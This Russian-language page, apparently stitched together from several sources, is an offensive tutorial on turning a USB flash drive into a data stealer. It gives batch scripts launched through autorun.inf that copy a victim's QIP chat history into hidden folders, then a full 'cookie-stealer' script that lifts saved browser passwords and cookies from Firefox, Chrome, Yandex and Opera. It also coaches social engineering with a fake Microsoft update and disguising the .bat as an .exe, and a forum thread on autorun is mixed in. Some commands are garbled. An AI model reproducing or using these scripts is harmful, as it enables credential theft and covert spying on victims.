Форма входа
Батник – это обыденный текстовый файл, содержащий наборы команд интерпретатора и имеющий расширение .bat либо .cmd! (.cmd работают лишь в ОС семейства NT). Редактировать такие файлы можно при помощи блокнота “Или хоть какого другого текстового редактора.
Пишем батник
Создавать,батник будем для 2-ой ситуации (она немного сложнее). Для написания батника возьмём обычный блокнот. В блокноте пропишем последующие строки:
@Echo off
c:
chdir C:Program FilesQIPUsers
f:rar.exe a -r users -r > nul
copy users.rar g:adc > nul
del users.rar > nul
где
©Echo off– прячет визуальный процесс копирования.
C:Program FilesQIPUsers – папка, в которой находится история.
f:rar.exe а -г users > nul -запуск архиватора для ускорения копирования.
copy users.rar g:adc > nul – адресок куда копируем.
del users.rar > nul – удаляет сделанный архив на жеском диске.
Не постоянно бывает известна буква флеш-диска. В “таком случае прописываем несколько вариантов (один уж точно угадаем):
@Echo off
с:
chdit C:Program FilesQIPUsers
f:rar.exe а -г users > nul
copy users.rar e:abc > nul
g:rar.exe a -r users > nul
copy users.rar g:abc > nul
h:rar.exe a -r users > nul
copy users.rar h:abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. Сейчас меняем расширение c .txt нa .bat. Это можно сделать в Total Commander’e.
Создаем автозапуск
Теперь нужно сделать так, чтобы батник автоматом запускался с флешки при подключении к компу. Для этого создаём новейший текстовый документ и пишем в нём:
[autorun]
ShellExeCute=”xxx.bat”
Сохраняем файл и переименовываем его на autorun.inf.
Делаем архив
Далее нам предстоит позаботится о архиваторе. QIP-история может быть крупная. Чтобы процесс копирования происходил скорее мы её заархивируем.
Из папки с WinRAR (по умолчанию C:Program FilesWinRAR берём файлик rar.exe. Создаём в корне флешки папку с именованием abc. Также, в корень флешки бросаем другие три файла (xxx.bat, autorun.inf, rar.exe).
Все файлы скрываем от посторонних глаз (правой клавишей мыши вызываем Меню на файле > Характеристики > Скрытый. Это всё. Отдаём флешку “жертве” и ждём результата.
Социальная инженерия
Не непременно делать автозапуск. “Жертва” сама может запустить батник. Для этого нужно пользоваться социальной инженерией. К примеру, сообщаем юзеру о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление увеличивает быстродействие и безопасность операционной системы. Устанавливать обновление необходимо только с флешки. Сможете сами придумать причину, по которой надо запустить наш батник. Всё зависит от вашей фантазии и смекалки.
Превращаем .bat в .exe
Для большей “безопасности” neperoним .bat в .ехе (вдруг”жертва” знакома с написанием батников). В этом нам поможет маленькая программка ExeScript v3.0.
Скачать можноэдесь: http://uploadbox.com/fMes/c8d5a60af9/ (размер 3.51. Мб). В окне программы жмём иконку с незапятнанным листом и избираем Batch file (bat) либо File > New > Batch file (bat). В появившемся окне пишем наш “текст”.
Теперь укажем для нашего ехе-шника подходящую иконку. В окне Propertiesщёлкаем на полеCustom Iconи выбираем заранееприготовленную иконку. Дальше нажимаемF7 илиProject > Build.Всё, ехе-шник готов.
При вставке флешки выполнить батник
![]() |
Я |
shellexecute=my.bat не отрабатывает
Как верно сделать? Либо windows такое в целях сохранности не делает? Ось – ХР.
или может в винде авторан отключен.
авторан разрешен, shellexecute=my.txt показывает
Возможно какая-то заплатка от МС задавила автозапуск на флэшках. Уж больно это черевато вирусами миллиону леммингов.
echo > recycler
attrib +h +s +r autorun.inf
attrib +h +s +r recycler
open=autorun.exe
на флешке не желает
в файле inf диска еще много что понаписано, может еще что указать требуется.
[Autorun]
Open=StartPortableApps.cmd
Action=Start PortableApps.com
Icon=autorun.ico
Label=PortableApps
У меня не работает, может ты галку поставил делать постоянно выбранное действие? Либо на всяком “новом” пк стартует?
[autorun]
open=1.cmd
Shellexecute=1.cmd
shellAutocommand=1.cmd
только записал, нод сходу стер его )
(20) ты ветку не читал
Action добавляет пункт в контекстное меню.
А вообщем я переработал под собственные нужды autorun.inf сгенеренный програмкой TrueCript (Это шифровальщик такой).
– выполнить приложение
– открыть проводником
– ничего не делать
(30) так у тебя авторан на CDFS разделе?
И проверь собственный диск с драйверами принтера.
“Определение оборудования оболочки
Служба отвечает за автоматический пуск содержимого компакт-дисков либо присоединенной флэш-карты. Опосля отключения данной нам службы из диалога параметров съемных дисков либо компакт-дисков исчезнет вкладка Автозапуск, а также будет отключена сама возможность, реализуемая данной вкладкой. Отключение службы не влияет на возможность автозапуска дисков, за которую отвечает DWORD-параметр AutoRun из ветки реестра HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ServicesCdrom. Ежели вы не используете возможность, предоставляемую вкладкой Автозапуск, то сможете смело отключать эту службу.
Служба Определение оборудования оболочки занимает около 70 Кбайт оперативной памяти и запускается с правами локальной системы (Local System) автоматом при каждом входе юзера в систему (запускается как часть процесса svchost.exe). Чтоб отключить эту службу, нужно пользоваться параметром Start из ветки системного реестра HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesShellHWDetection.
Для пуска службы нужно, чтоб была запущена служба Удаленный вызов процедур (RPC). Для ее работы нужна библиотека shsvcs.dll.”
http://lib.rus.ec/b/174399/read
Накой для тебя необходимо то, что остальные отключают?
Посочнее раскажи.
А есть случаи, когда Определение оборудования оболчки ничего не спрашивает, но делает.
(41) плохая реклама хэстартера
(48) =>(9) здесь пишу, там использую
Как сделать cookie-стиллер из флешки
Никогда, ни при каких критериях не сохраняйте пароли в браузере, сейчас расскажу почему.
Мы разглядим обычный, но действенный метод, быстро выяснить пароли, который, неосторожный юзер, а таковых много, поверьте, сохранил в браузере, это ведь так комфортно, правда, не нужно запоминать пароль, не необходимо каждый раз его вводить ручками и т.д. плюсов масса, но, есть один минус, и большой, украсть такие пароли вообщем не проблема.
Сейчас, мы быстро и вообщем не натуживаясь создадим из обычный флешки cookie-стиллер, а позже расшифруем файлы cookie, чтоб выяснить все пароли сохраненные в браузере.
Для начала, вы должны осознавать, что такое файл cookie, это, в собственном роде, таковой зашифрованный текстовый документ в котором храниться основная иформация о пользователе.
Но хватит теории, приступим.
Во первых, нам пригодиться флешка.
На ней мы сделаем два текстовых файла:
1-ый – autorun.inf
2-ой – stealer.bat
не забудьте включить отображение расширений файлов, чтобы можно было поменять txt на inf и bat соответственно, это ежели вдруг кто не догадался)
дальше, в файле autorun мы пишем:[AutoRun]Open=”stealer.bat”
[AutoRun]
Open=”stealer.bat”
всё, сохранили, закрыли. Это автозапуск нашего стиллера
В файле stealer.bat пишем:
@echo off
md %~d0Mozilla
md %~d0 pera
md %~d0Google
md %~d0Yandex
md %~d0Amigo
CD/D %APPDATA%OperaOpera
cls
copy /y wand.dat %~d0Opera
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %~d0Mozilla
copy /y key3.db %~d0Mozilla
copy /y signons.sqlite %~d0Mozilla
copy /y %AppData%MozillaFirefoxProfiles*.default %~d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
cls
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%~d0Google”
cd %localappdata%YandexYandexBrowserUser DataDefault
copy /y “%localappdata%YandexYandexBrowserUser DataDefaultLogin Data” “%~d0Yandex”
cd %localappdata%AmigoUser DataDefault
copy /y “%localappdata%AmigoUser DataDefaultLogin Data” “%~d0Amigo”
cls
ATTRIB -R -A -S -H
attrib +h %~d0Mozilla
attrib +h %~d0Opera
attrib +h %~d0Google
attrib +h %~d0Yandex
attrib +h %~d0Amigo
attrib +h %~d0search.bat
attrib +h %~d0new
attrib +h %~d0autorun.inf
del: autorun.inf?
тоже сохраняем, закрываем. Опосля чего же заходим в характеристики этих файлов и делаем их сокрытыми. Стиллер готов.
Сейчас, стоит тормознуть на неких аспектах. А именно:
В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Потому придется придумать метод получить доступ к компу и ручками запустить файл stealer.bat, благо процесс занимает чрезвычайно не достаточно времени, а придумать предлог сесть на минутку за чужой комп много мозга не нужно, ведь так? На всех прошлых версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.
Последующий аспект, антивирус на эту манипуляцию никак не отреагирует, потому антивируса боятся не стоит, а вот фаервол всё это дело перекроет на раз два. Здесь принципиально осознавать, что человек который установил и настроил фаервол, походу что-то кое-где соображает и уж наверное не будет хранить пароли в браузере, к такому персонажу нужен наиболее узкий подход, в последующих видео придумаем.
По аспектам всё.